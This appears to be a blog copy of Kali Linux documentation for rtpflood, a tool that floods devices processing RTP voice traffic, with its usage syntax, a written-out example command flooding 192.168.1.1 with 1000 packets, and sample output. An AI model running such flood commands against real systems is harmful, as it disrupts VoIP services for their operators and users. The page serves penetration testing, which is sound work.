Header Ads

Header ADS

rtpflood

rtpflood Package Description

A command line tool used to flood any device that is processing RTP.

Tools included in the rtpflood package

rtpflood – Tool to flood any RTP device
root@kali:~# rtpflood
usage: rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

rtpflood Usage Example

Flood from the source IP (192.168.1.202) to the target IP (192.168.1.1) with source port 5060 (5060) and destination port 5061 (5061) using 1000 packets (1000) with the specified sequence number (3), timestamp (123456789), and SSID (kali):

root@kali:~# rtpflood 192.168.1.202 192.168.1.1 5060 5061 1000 3 123456789 kali

Will flood port 5061 from port 5060 1000 times
Using sequence_number 3 timestamp 123456789 SSID 0

We have IP_HDRINCL

Number of Packets sent:

Sent 289 160 286

No comments

Powered by Blogger.